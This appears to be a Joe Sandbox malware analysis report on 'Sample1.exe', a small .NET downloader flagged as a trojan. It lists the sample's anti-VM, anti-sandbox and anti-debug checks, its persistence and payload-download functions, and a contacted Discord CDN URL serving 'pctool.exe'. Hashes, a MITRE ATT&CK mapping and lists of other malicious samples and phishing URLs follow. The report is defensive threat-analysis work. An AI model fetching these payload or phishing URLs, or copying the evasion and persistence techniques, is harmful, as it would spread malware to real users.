        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\SystemSettingsBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: Sample1.exeBinary or memory string: SBIEDLL.DLL7
        Source: C:\Users\user\Desktop\Sample1.exeMemory allocated: F20000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeMemory allocated: 1AC80000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeWindow / User API: threadDelayed 844Jump to behavior
        Source: C:\Users\user\Desktop\Sample1.exe TID: 8068Thread sleep count: 112 > 30Jump to behavior
        Source: C:\Users\user\Desktop\Sample1.exe TID: 8068Thread sleep count: 844 > 30Jump to behavior
        Source: C:\Users\user\Desktop\Sample1.exe TID: 8068Thread sleep time: -145000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exe TID: 5576Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exe TID: 5576Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Sample1.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Sample1.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeThread delayed: delay time: 600000Jump to behavior
        Source: SystemSettingsBroker.exe, 00000027.00000003.3123186986.000001CE791A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
        Source: SystemSettingsBroker.exe, 00000027.00000003.3123186986.000001CE791A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Deviceb
        Source: Sample1.exeBinary or memory string: vmware
        Source: SystemSettingsBroker.exe, 00000027.00000003.3123186986.000001CE791A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00|
        Source: SystemSettingsBroker.exe, 00000027.00000003.3129899216.000001CE79168000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: SystemSettingsBroker.exe, 00000027.00000003.3129899216.000001CE79168000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
        Source: SystemSettingsBroker.exe, 00000027.00000002.3196466727.000001CE79165000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ..SWD\COMPUTER\MFG_VMware__Inc.&PROD_VMware20_1
        Source: SystemSettingsBroker.exe, 00000027.00000002.3195988847.000001CE79100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
        Source: SystemSettingsBroker.exe, 00000027.00000002.3196466727.000001CE79165000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driverp
        Source: Sample1.exe, 00000000.00000002.3194048765.0000000000C09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
        Source: SystemSettingsBroker.exe, 00000027.00000002.3195631104.000001CE76EF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc. VMware20,1
        Source: Sample1.exeBinary or memory string: DetectVirtualMachine
        Source: Sample1.exeBinary or memory string: <Module>pctool.exeProgramStubRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorMainDownloadPayloadRunOnStartup.ctorExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatorurlregNameAppPathHidepathlpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributepctoolEnvironmentExitSystem.ThreadingThreadSleepSystem.IOPathGetTempPathCombineFileWriteAllBytesSystem.NetServicePointManagerSecurityProtocolTypeset_SecurityProtocolWebRequestCreateHttpWebRequestset_MethodWebResponseGetResponseHttpWebResponseStreamGetResponseStreamMemoryStreamCopyToCloseDisposeToArrayIDisposableAppDomainget_CurrentDomainget_FriendlyNameStringConcatExistsAssemblyGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineOpenSubKeySetValueCurrentUserException.cctorSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_Currentget_ItemToStringToLowerop_EqualityToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticks
        Source: SystemSettingsBroker.exe, 00000027.00000002.3196466727.000001CE79165000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
        Source: SystemSettingsBroker.exe, 00000027.00000002.3196285032.000001CE79144000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus DeviceNN
        Source: SystemSettingsBroker.exe, 00000027.00000003.3129899216.000001CE79168000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v@oem1.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Devicep
        Source: SystemSettingsBroker.exe, 00000027.00000003.3123186986.000001CE791A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: SystemSettingsBroker.exe, 00000027.00000002.3196466727.000001CE79165000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0VMware, Inc. VMware20,1
        Source: SystemSettingsBroker.exe, 00000027.00000002.3196285032.000001CE79144000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB MouseZ
        Source: SystemSettingsBroker.exe, 00000027.00000002.3195988847.000001CE79100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
        Source: SystemSettingsBroker.exe, 00000027.00000003.3129899216.000001CE79168000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
        Source: SystemSettingsBroker.exe, 00000027.00000002.3195631104.000001CE76EF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SWD\COMPUTER\MFG_VMware__Inc.&PROD_VMware20_1
        Source: SystemSettingsBroker.exe, 00000027.00000003.3129899216.000001CE79168000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
        Source: C:\Users\user\Desktop\Sample1.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeQueries volume information: C:\Users\user\Desktop\Sample1.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Sample1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        DLL Side-Loading        		1
        Process Injection        		1
        Disable or Modify Tools        		OS Credential Dumping11
        Security Software Discovery        		Remote ServicesData from Local System1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading        		31
        Virtualization/Sandbox Evasion        		LSASS Memory31
        Virtualization/Sandbox Evasion        		Remote Desktop ProtocolData from Removable Media3
        Non-Application Layer Protocol        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Process Injection        		Security Account Manager1
        Application Window Discovery        		SMB/Windows Admin SharesData from Network Shared Drive4
        Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        DLL Side-Loading        		NTDS12
        System Information Discovery        		Distributed Component Object ModelInput Capture3
        Ingress Tool Transfer        		Traffic DuplicationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Sample1.exe83%VirustotalBrowse
        Sample1.exe82%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
        Sample1.exe100%AviraTR/ATRAPS.Gen
        Sample1.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://crl.microsoftm0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        bg.microsoft.map.fastly.net
        		199.232.214.172
        		truefalse
          		high
          cdn.discordapp.com
          		162.159.134.233
          		truefalse
            		high
            assets.msn.com
            		unknown
            		unknownfalse
              		high
              browser.events.data.msn.cn
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exefalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://cdn.discordapp.comSample1.exe, 00000000.00000002.3195973420.0000000002D02000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3195973420.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3195973420.0000000002E97000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3195973420.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSample1.exe, 00000000.00000002.3195973420.0000000002D02000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://crl.microsoftmSample1.exe, 00000000.00000002.3198337251.000000001BD2A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://cdn.discordapp.comSample1.exe, 00000000.00000002.3195973420.0000000002E97000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3195973420.0000000002D29000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        162.159.134.233
                        		cdn.discordapp.comUnited States
                        		13335CLOUDFLARENETUSfalse

                        General Information

                        Joe Sandbox version:42.0.0 Malachite
                        Analysis ID:1591875
                        Start date and time:2025-01-15 15:17:52 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 10s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                        Run name:Run with higher sleep bypass
                        Number of analysed new started processes analysed:42
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Sample1.exe
                        Detection:MAL
                        Classification:mal84.troj.evad.winEXE@2/0@3/1
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SecurityHealthHost.exe, dllhost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 2.23.227.209, 2.23.227.197, 2.23.227.207, 2.23.227.212, 2.23.227.213, 2.23.227.196, 40.79.167.8, 2.23.242.162, 4.175.87.197, 20.12.23.50, 40.126.32.74
                        • Excluded domains from analysis (whitelisted): assets.msn.com.edgekey.net, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, onedscolprdaue02.australiaeast.cloudapp.azure.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, otelrules.svc.static.microsoft, login.live.com, global.asimov.events.data.trafficmanager.net, wu-b-net.trafficmanager.net, e28578.d.akamaiedge.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        162.159.134.233Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                        • cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
                        http://162.159.134.233:443Get hashmaliciousUnknownBrowse
                        • 162.159.134.233:443/
                        PO - Drawings And Specifications Sheet_pdf.scr.exeGet hashmaliciousAveMariaBrowse
                        • cdn.discordapp.com/attachments/472051232014598144/935778066171580456/Sjddks44.jpg
                        mvoElayshk.exeGet hashmaliciousAmadeyBrowse
                        • cdn.discordapp.com/attachments/880877737378734114/880877802512060426/5mgcqk6jl.exe
                        xuTyOmef1g.exeGet hashmaliciousAmadey RedLine SmokeLoaderBrowse
                        • cdn.discordapp.com/attachments/878382243242983437/879113244856430592/Microsoft.exe

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        cdn.discordapp.comgshv2.exeGet hashmaliciousUnknownBrowse
                        • 162.159.129.233
                        PO_11171111221.Vbs.vbsGet hashmaliciousFormBookBrowse
                        • 162.159.129.233
                        WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                        • 162.159.129.233
                        sNifdpWiY9.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                        • 162.159.134.233
                        EsgeCzT4do.exeGet hashmaliciousXWormBrowse
                        • 162.159.129.233
                        file.exeGet hashmaliciousUnknownBrowse
                        • 162.159.135.233
                        file.exeGet hashmaliciousCStealerBrowse
                        • 162.159.134.233
                        https://cdn.discordapp.com/attachments/1284277835762110544/1305291734967779460/emu.exe?ex=67327f28&is=67312da8&hm=ea20e1c2a609dc1a0569bd4abb7e0da0a5e0671f3f7a388c1ed138f806c8e0c4&Get hashmaliciousUnknownBrowse
                        • 162.159.135.233
                        SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeGet hashmaliciousXmrigBrowse
                        • 162.159.135.233
                        bg.microsoft.map.fastly.netalN48K3xcD.dllGet hashmaliciousWannacryBrowse
                        • 199.232.214.172
                        RFQ # PC25-1301.xlsxGet hashmaliciousUnknownBrowse
                        • 199.232.210.172
                        21033090848109083.jsGet hashmaliciousStrela DownloaderBrowse
                        • 199.232.210.172
                        https://www.pdfforge.org/pdfcreator?srsltid=AfmBOoq1lpA5qNxfcLUyxjmEXAioeKYtqPTpBsIbZ5VOdq3uhOg1WclGGet hashmaliciousUnknownBrowse
                        • 199.232.214.172
                        0969686.vbeGet hashmaliciousAgentTeslaBrowse
                        • 199.232.210.172
                        00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                        • 199.232.210.172
                        31070304561863532281.jsGet hashmaliciousStrela DownloaderBrowse
                        • 199.232.210.172
                        Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                        • 199.232.214.172
                        new.batGet hashmaliciousUnknownBrowse
                        • 199.232.214.172
                        2387315401298627745.jsGet hashmaliciousStrela DownloaderBrowse
                        • 199.232.214.172

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        CLOUDFLARENETUShttps://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/index.html#watson.becky@aidb.orgGet hashmaliciousHTMLPhisherBrowse
                        • 172.66.0.235
                        https://guidantmeasurement-dot-level-district-447409-i0.as.r.appspot.com/Get hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                        • 104.19.229.21
                        Invoice No 1122207 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 104.21.112.1
                        https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q#support@sealevel.comGet hashmaliciousHTMLPhisherBrowse
                        • 104.21.64.1
                        https://atgroupbe.com/?mzbexmhu=bbd299e40cc6ba4977bf44a725eec5648bda7170169e3fbfd31a05747fa7276fd2437dda5a583d6a5ff345cb6fce6d6bd82e92021cc24ab98d2ebfffc47a5826&qrc=nmertens@vanas.euGet hashmaliciousHTMLPhisherBrowse
                        • 104.18.95.41
                        qqnal04.exeGet hashmaliciousPhemedrone StealerBrowse
                        • 172.67.70.233
                        http://petruccilaw.com/Get hashmaliciousUnknownBrowse
                        • 104.17.196.192
                        PDF6UU0CVUO2W-YGVUIO.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                        • 104.21.96.1
                        https://eventor.orienteering.asn.au/Home/RedirectToLivelox?redirectUrl=https%3A%2F%2Farchive1.diqx8fescpsb0.amplifyapp.com%2Fm1%2Fenvelope%2Fdocument%2Fcontent%2F4086Get hashmaliciousUnknownBrowse
                        • 104.17.25.14

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        6a5d235ee78c6aede6a61448b4e9ff1eDebh Payment Detail.htmlGet hashmaliciousUnknownBrowse
                        • 162.159.134.233
                        NoticeOfPayment.docxGet hashmaliciousUnknownBrowse
                        • 162.159.134.233
                        Absa Remittance Advice.docxGet hashmaliciousUnknownBrowse
                        • 162.159.134.233
                        Rev5_ Joint Declaration C5 GER_track changes.docGet hashmaliciousUnknownBrowse
                        • 162.159.134.233
                        YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
                        • 162.159.134.233
                        3bSDIpSIdF.msiGet hashmaliciousUnknownBrowse
                        • 162.159.134.233
                        http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousUnknownBrowse
                        • 162.159.134.233
                        2M and OPS Cobot White Paper 01082025 TM CH (1).docxGet hashmaliciousUnknownBrowse
                        • 162.159.134.233
                        Setup.exeGet hashmaliciousUnknownBrowse
                        • 162.159.134.233

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):4.677687653335447
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:Sample1.exe
                        File size:8'192 bytes
                        MD5:45a47d815f2291bc7fc0112d36aaad83
                        SHA1:db1dc02b2d64c4c3db89b5df3124dd87d43059d5
                        SHA256:416e63fb614101d5644592d5f589f358f8d5a41dd6812a717cbf05470864ac6f
                        SHA512:a7d98145cf949a42ace2da725a22847ad814a28137d32b0b220430b91c89aabed7144b85f20c2fd9a1a02f5b92520bf5f0afbe8202028f9832cbc29c2a9e776e
                        SSDEEP:96:gJOElmu1B9ilJJMOfEkdEKozt1ExQf8cqkTzNt:gLkJwGE3Eez1
                        TLSH:72F1D506B7E90737DCBE4B7E98B3471053B2E7154D12CB1E58C8825E6CA27140EA2BB6
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r..a.............................4... ...@....@.. ....................................@................................

                        File Icon

                        Icon Hash:2086969696969600

                        Static PE Info

                        General

                        Entrypoint:0x4034de
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x611BC772 [Tue Aug 17 14:28:02 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x348c0x4f.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x4d8.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
